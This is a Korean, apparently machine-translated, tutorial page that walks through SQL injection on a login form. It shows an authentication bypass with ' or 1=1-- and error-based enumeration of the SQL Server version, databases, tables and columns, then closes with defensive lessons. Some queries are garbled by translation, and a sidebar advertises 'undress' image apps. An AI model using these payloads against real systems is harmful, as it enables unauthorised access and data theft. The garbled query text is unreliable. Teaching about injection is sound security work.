찾다
데이터 베이스MySQL 튜토리얼SQL 인젝션 예시 프로세스 공유

SQL 인젝션은 매우 해롭다. 이 글은 SQL 인젝션 인스턴스의 전체 과정을 기록하고 있다.

초기 주입 - 우회인증, 직접 로그인

회사 홈페이지 로그인창은 다음과 같습니다.

SQL 인젝션 예시 프로세스 공유

네, 계정과 비밀번호 외에 회사명 입력란도 있는 걸 봤는데, 입력란의 형태로 보아 SQL이 다음과 같이 적혀 있는 것을 유추하기 어렵지 않습니다.

SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

처음 두 개는 몇 가지 검사를 하고, 세 번째는 입력 상자가 무시되었고 허점이 발견되었습니다! 주입이 시작되면 입력창에 다음 내용을 입력하세요.

SQL 인젝션 예시 프로세스 공유

사용자 이름을 임의로 입력하고 비밀번호는 비워두세요. 이 경우 로그인을 클릭한 후 버튼 성공적으로 로그인되었습니다. 최종 SQL을 보면

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

코드에서 알 수 있듯이 작은따옴표의 앞부분은 닫혀 있고, 작은따옴표의 뒷부분은 주석 처리되어 있습니다. 에 "--"를 추가합니다. 중간에 항상 true인 추가 조건 "1=1"이 있어 모든 캐릭터의 로그인이 성공합니다. SQL 주입의 피해는 단지 익명 로그인만이 아닙니다.

중간 주입--예외를 통해 정보를 얻습니다.

이제 세 번째 입력 상자에 "' 또는 1=(SELECT @@version) –"라고 씁니다.

SQL 인젝션 예시 프로세스 공유

백그라운드 SQL은 다음과 같습니다.

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)--'

판정 조건은 1=(SELECT @@VERSION)이 됩니다. 확실히 작동하면 오류가 발생하지만 오류는 정확히 우리가 원하는 것입니다. 로그인을 클릭하면 페이지에 다음 정보가 나타납니다.

Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) &#39; to data type int.

실제로 서버 운영체제와 SQL Server 버전 정보가 오류로 표시되는 끔찍한 일이 발생했습니다.

harm의 확장--서버의 모든 라이브러리 이름, 테이블 이름 및 필드 이름을 얻습니다

그런 다음 입력 상자에 다음 정보를 입력합니다. "t' 또는 1=( SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--". 이때 세 번째 입력 상자에 단어가 있는 것으로 확인되었습니다. 그러나 이 클라이언트의 제한은 헛된 것이며 Google Chrome을 통해 직접 제거할 수 있습니다.

SQL 인젝션 예시 프로세스 공유

클릭하여 로그인하면 반환되는 정보는 다음과 같습니다.

Conversion failed when converting the nvarchar value &#39;master&#39; to data type int.

예외를 통해 데이터베이스 이름 "master"가 표시됩니다! 위 SQL문의 일련번호를 차례로 변경하면 서버에 있는 모든 데이터베이스의 이름을 알 수 있다.

다음으로 다음 정보를 입력합니다. "b' 또는 1=(SELECT top 1 name FROM master..sysobjects 여기서 xtype='U'이고 이름이 (SELECT top에 없음) 1 name FROM master..sysobjects where xtype='U'))--"

반환 정보는 다음과 같습니다.

Conversion failed when converting the nvarchar value &#39;spt_fallback_db&#39; to data type int.

마스터 데이터베이스에서 첫 번째 테이블 이름을 얻었습니다. " spt_fallback_db "와 마찬가지로 일련번호를 순차적으로 변경하면 라이브러리의 모든 테이블명을 얻을 수 있다.

이제 "spt_fallback_db" 테이블을 예로 들어 테이블의 모든 필드 이름을 가져오겠습니다. 입력 상자에 다음 코드를 입력합니다. "b' 또는 1=(select top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master ..sysobjects.name='spt_fallback_db');"

따라서 오류 메시지는 다음과 같습니다.

"Conversion failed when converting the nvarchar value &#39;xserver_name&#39; to data type int.";

이렇게 하면 첫 번째 필드 이름인 "xserver_name"이 나오고, 변경 시퀀스 번호를 순서대로 지정하고 모든 필드 이름을 순회할 수 있습니다.

궁극적인 목표 - 데이터베이스의 데이터를 얻는 것

이 글을 작성하면서 우리는 이를 방지하기 위해 SQL 삽입을 통해 모든 데이터베이스, 테이블 및 필드를 얻을 수 있다는 것을 알고 있습니다. 기사가 완전히 주입 튜토리얼이 되었기 때문에 데이터를 얻는 코드는 더 이상 설명되지 않으며 이 기사의 목적은 달성되었습니다. SQL 주입이란 무엇을 의미합니까? 은 데이터베이스의 모든 데이터가 도난당할 수 있다는 의미입니다.

위험을 알고도 SQL 인젝션 취약점을 무시할 수 있는 사람이 있을까요?

결론

보안과 관련하여 이 기사에서는 다음 사항을 요약할 수 있습니다.

  1. 사용자가 입력하는 내용에 항상 주의하세요.

  2. 클라이언트 측 확인만 있으면 확인이 없습니다.

  3. 절대 서버 오류 메시지를 사용자에게 노출하지 마세요.

추가로 몇 가지 사항을 추가하고 싶습니다.

  1. SQL 주입은 입력 상자뿐만 아니라 URL을 통해.

  2. 서버 오류 페이지 외에도 데이터베이스 정보를 얻을 수 있는 다른 방법이 있습니다.

  3. 소프트웨어를 통해 주입 동작을 시뮬레이션할 수 있습니다. 이렇게 하면 생각보다 훨씬 빠르게 정보를 훔칠 수 있습니다.

  4. 해당 취약점은 언어 플랫폼과는 아무런 관련이 없습니다. asp에 주입 취약점이 있는 것은 아니지만 asp.net에는 주입 취약점이 없습니다. 모든 것은 디자이너의 세심한 배려에 달려있습니다.

[관련 추천]

1. 특별 추천: "php 프로그래머 도구 다운로드 "Box" V0.1 버전

2. SQL 인젝션을 방지하려면? SQL 인젝션 예방 방법 5가지 소개

3. 유명한 SQL 인젝션 취약점 검사 도구 5가지 공유

4. 사용 사례 공유 SQL 주입 취약점 드래그 라이브러리

위 내용은 SQL 인젝션 예시 프로세스 공유의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
MySQL에 저장된 절차는 무엇입니까?MySQL에 저장된 절차는 무엇입니까?May 01, 2025 am 12:27 AM

저장된 절차는 성능을 향상시키고 복잡한 작업을 단순화하기 위해 MySQL에서 사전 컴파일 된 SQL 문입니다. 1. 성능 향상 : 첫 번째 편집 후 후속 통화를 다시 컴파일 할 필요가 없습니다. 2. 보안 향상 : 권한 제어를 통해 데이터 테이블 액세스를 제한합니다. 3. 복잡한 작업 단순화 : 여러 SQL 문을 결합하여 응용 프로그램 계층 로직을 단순화합니다.

쿼리 캐싱은 MySQL에서 어떻게 작동합니까?쿼리 캐싱은 MySQL에서 어떻게 작동합니까?May 01, 2025 am 12:26 AM

MySQL 쿼리 캐시의 작동 원리는 선택 쿼리 결과를 저장하는 것이며 동일한 쿼리가 다시 실행되면 캐시 된 결과가 직접 반환됩니다. 1) 쿼리 캐시는 데이터베이스 읽기 성능을 향상시키고 해시 값을 통해 캐시 된 결과를 찾습니다. 2) MySQL 구성 파일에서 간단한 구성, query_cache_type 및 query_cache_size를 설정합니다. 3) SQL_NO_CACHE 키워드를 사용하여 특정 쿼리의 캐시를 비활성화하십시오. 4) 고주파 업데이트 환경에서 쿼리 캐시는 성능 병목 현상을 유발할 수 있으며 매개 변수의 모니터링 및 조정을 통해 사용하기 위해 최적화해야합니다.

다른 관계형 데이터베이스를 통해 MySQL을 사용하면 어떤 장점이 있습니까?다른 관계형 데이터베이스를 통해 MySQL을 사용하면 어떤 장점이 있습니까?May 01, 2025 am 12:18 AM

MySQL이 다양한 프로젝트에서 널리 사용되는 이유에는 다음이 포함됩니다. 1. 고성능 및 확장 성, 여러 스토리지 엔진을 지원합니다. 2. 사용 및 유지 관리, 간단한 구성 및 풍부한 도구; 3. 많은 지역 사회 및 타사 도구 지원을 유치하는 풍부한 생태계; 4. 여러 운영 체제에 적합한 크로스 플랫폼 지원.

MySQL에서 데이터베이스 업그레이드를 어떻게 처리합니까?MySQL에서 데이터베이스 업그레이드를 어떻게 처리합니까?Apr 30, 2025 am 12:28 AM

MySQL 데이터베이스를 업그레이드하는 단계에는 다음이 포함됩니다. 1. 데이터베이스 백업, 2. 현재 MySQL 서비스 중지, 3. 새 버전의 MySQL 설치, 4. 새 버전의 MySQL 서비스 시작, 5. 데이터베이스 복구. 업그레이드 프로세스 중에 호환성 문제가 필요하며 Perconatoolkit과 같은 고급 도구를 테스트 및 최적화에 사용할 수 있습니다.

MySQL에 사용할 수있는 다른 백업 전략은 무엇입니까?MySQL에 사용할 수있는 다른 백업 전략은 무엇입니까?Apr 30, 2025 am 12:28 AM

MySQL 백업 정책에는 논리 백업, 물리적 백업, 증분 백업, 복제 기반 백업 및 클라우드 백업이 포함됩니다. 1. 논리 백업은 MySQLDump를 사용하여 데이터베이스 구조 및 데이터를 내보내며 소규모 데이터베이스 및 버전 마이그레이션에 적합합니다. 2. 물리적 백업은 데이터 파일을 복사하여 빠르고 포괄적이지만 데이터베이스 일관성이 필요합니다. 3. 증분 백업은 이진 로깅을 사용하여 변경 사항을 기록합니다. 이는 큰 데이터베이스에 적합합니다. 4. 복제 기반 백업은 서버에서 백업하여 생산 시스템에 미치는 영향을 줄입니다. 5. AmazonRDS와 같은 클라우드 백업은 자동화 솔루션을 제공하지만 비용과 제어를 고려해야합니다. 정책을 선택할 때 데이터베이스 크기, 가동 중지 시간 허용 오차, 복구 시간 및 복구 지점 목표를 고려해야합니다.

MySQL 클러스터링이란 무엇입니까?MySQL 클러스터링이란 무엇입니까?Apr 30, 2025 am 12:28 AM

mysqlclusteringenhancesdatabaserobustness andscalabilitydaturedingdataacrossmultiplenodes.itusesthendbenginefordatareplicationandfaulttolerance, highavailability를 보장합니다

MySQL의 성능을 위해 데이터베이스 스키마 설계를 어떻게 최적화합니까?MySQL의 성능을 위해 데이터베이스 스키마 설계를 어떻게 최적화합니까?Apr 30, 2025 am 12:27 AM

MySQL에서 데이터베이스 스키마 설계 최적화는 다음 단계를 통해 성능을 향상시킬 수 있습니다. 1. 인덱스 최적화 : 공통 쿼리 열에서 인덱스 생성, 쿼리의 오버 헤드 균형 및 업데이트 삽입. 2. 표 구조 최적화 : 정규화 또는 정상화를 통한 데이터 중복성을 줄이고 액세스 효율을 향상시킵니다. 3. 데이터 유형 선택 : 스토리지 공간을 줄이기 위해 Varchar 대신 Int와 같은 적절한 데이터 유형을 사용하십시오. 4. 분할 및 하위 테이블 : 대량 데이터 볼륨의 경우 파티션 및 하위 테이블을 사용하여 데이터를 분산시켜 쿼리 및 유지 보수 효율성을 향상시킵니다.

MySQL 성능을 어떻게 최적화 할 수 있습니까?MySQL 성능을 어떻게 최적화 할 수 있습니까?Apr 30, 2025 am 12:26 AM

tooptimizemysqlperformance, followthesesteps : 1) 구현 properIndexingToSpeedUpqueries, 2) useExplaintoAnalyzeanDoptimizeQueryPerformance, 3) AdvertServerConfigUrationSettingstingslikeInnodb_buffer_pool_sizeandmax_connections, 4) uspartOflEtOflEtOflestoI

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

Video Face Swap

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

SecList

SecList

SecLists는 최고의 보안 테스터의 동반자입니다. 보안 평가 시 자주 사용되는 다양한 유형의 목록을 한 곳에 모아 놓은 것입니다. SecLists는 보안 테스터에게 필요할 수 있는 모든 목록을 편리하게 제공하여 보안 테스트를 더욱 효율적이고 생산적으로 만드는 데 도움이 됩니다. 목록 유형에는 사용자 이름, 비밀번호, URL, 퍼징 페이로드, 민감한 데이터 패턴, 웹 셸 등이 포함됩니다. 테스터는 이 저장소를 새로운 테스트 시스템으로 간단히 가져올 수 있으며 필요한 모든 유형의 목록에 액세스할 수 있습니다.

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

Dreamweaver Mac版

Dreamweaver Mac版

시각적 웹 개발 도구